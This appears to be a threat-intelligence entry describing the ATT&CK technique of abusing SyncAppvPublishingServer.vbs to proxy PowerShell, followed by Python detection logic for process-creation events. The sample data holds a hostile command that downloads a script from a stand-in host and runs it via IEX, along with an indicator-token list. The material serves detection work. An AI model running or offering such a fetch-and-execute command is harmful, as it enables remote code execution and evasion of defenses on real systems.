SyncAppvPublishingServer - T1216.002 (e6f19759-dde3-47fc-99cc-d9f5fa4ade60)
Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious PowerShell commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)
The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from \System32 through the command line via wscript.exe.(Citation: 4 - appv)(Citation: 5 - appv)
Adversaries may abuse SyncAppvPublishingServer.vbs to bypass PowerShell execution restrictions and evade defensive countermeasures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking powershell.exe.(Citation: 7 - appv)
For example, PowerShell commands may be invoked using:(Citation: 5 - appv)
SyncAppvPublishingServer.vbs "n; {PowerShell}"
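The invocation above works because the script passes its argument on to PowerShell, so a ";" ends the argument the script expects ("n") and whatever follows runs as PowerShell. The following detection logic is an added example and is not part of this page or of the ATT&CK entry: it scans process-creation records (field names modelled on Sysmon Event ID 1) for a SyncAppvPublishingServer.vbs argument that carries PowerShell after the ";", and for a powershell.exe child whose parent is a script host running the .vbs. The indicator tokens, the helper names and the sample events are assumptions constructed for the example; the child powershell.exe command line is a placeholder, not the string the real script builds.

```python
import re
from dataclasses import dataclass

# Assumed indicators for this example; tune to your environment.
SCRIPT_RE = re.compile(r"SyncAppvPublishingServer\.vbs", re.IGNORECASE)
HOST_RE = re.compile(r"(?:^|\\)(?:wscript|cscript)\.exe$", re.IGNORECASE)
PS_RE = re.compile(r"(?:^|\\)powershell\.exe$", re.IGNORECASE)
PS_INDICATORS = (
    "iex", "invoke-expression", "new-object", "downloadstring",
    "invoke-webrequest", "start-process", "frombase64string", "-enc",
)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (fields modelled on Sysmon Event ID 1)."""
    image: str
    command_line: str
    parent_image: str = ""
    parent_command_line: str = ""


def injected_payload(command_line: str):
    """Return the text after the first ';' of the script's argument, or None.

    The abuse relies on ';' terminating the argument the script expects
    (the "n" in the page's example) so that the remainder reaches PowerShell.
    """
    m = SCRIPT_RE.search(command_line)
    if not m:
        return None
    rest = command_line[m.end():]
    quoted = re.search(r'"([^"]*)"', rest)      # argument is normally quoted
    arg = quoted.group(1) if quoted else rest.strip()
    if ";" not in arg:
        return None
    return arg.split(";", 1)[1].strip()


def evaluate(ev: ProcessEvent) -> list:
    """Return finding strings for one event (empty list if nothing suspicious)."""
    findings = []
    payload = injected_payload(ev.command_line)
    if payload is not None:
        low = payload.lower()
        hits = [t for t in PS_INDICATORS if t in low]
        if hits:
            findings.append(
                "SyncAppvPublishingServer.vbs argument carries PowerShell after ';' "
                f"({', '.join(hits)})"
            )
    # A powershell.exe child of wscript/cscript running the .vbs is the proxied
    # execution itself, visible even if the .vbs command line was not captured.
    if (PS_RE.search(ev.image) and HOST_RE.search(ev.parent_image)
            and SCRIPT_RE.search(ev.parent_command_line)):
        findings.append(
            "powershell.exe spawned by script host executing SyncAppvPublishingServer.vbs"
        )
    return findings


def scan(events):
    """Return [(event_index, finding), ...] over a list of ProcessEvent records."""
    out = []
    for i, ev in enumerate(events):
        for f in evaluate(ev):
            out.append((i, f))
    return out


# Constructed sample events (not real telemetry).
ATTACKER_CMD = (
    r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs '
    '"n;(New-Object Net.WebClient).DownloadString(\'http://example.invalid/s.ps1\') | IEX"'
)
SAMPLE_EVENTS = [
    # 0: script host launched with an injected PowerShell payload
    ProcessEvent(r"C:\Windows\System32\wscript.exe", ATTACKER_CMD,
                 r"C:\Windows\explorer.exe", "explorer.exe"),
    # 1: the resulting child powershell.exe (command line is a placeholder)
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe <command built by the .vbs>",
                 r"C:\Windows\System32\wscript.exe", ATTACKER_CMD),
    # 2: script run with a plain argument and no ';' (treated as benign here)
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n"',
                 r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

The two checks are deliberately independent: the first fires on the .vbs command line alone, the second on the parent/child relationship alone, so either the wscript.exe record or the powershell.exe record is enough to raise the alert. The token list is a heuristic; an attacker can obfuscate the payload, so the parent/child check is the more robust of the two.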
| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| System Script Proxy Execution - T1216 (f6fe9070-7a65-49ea-ae72-76292f42cebe) | Attack Pattern | SyncAppvPublishingServer - T1216.002 (e6f19759-dde3-47fc-99cc-d9f5fa4ade60) | Attack Pattern | 1 |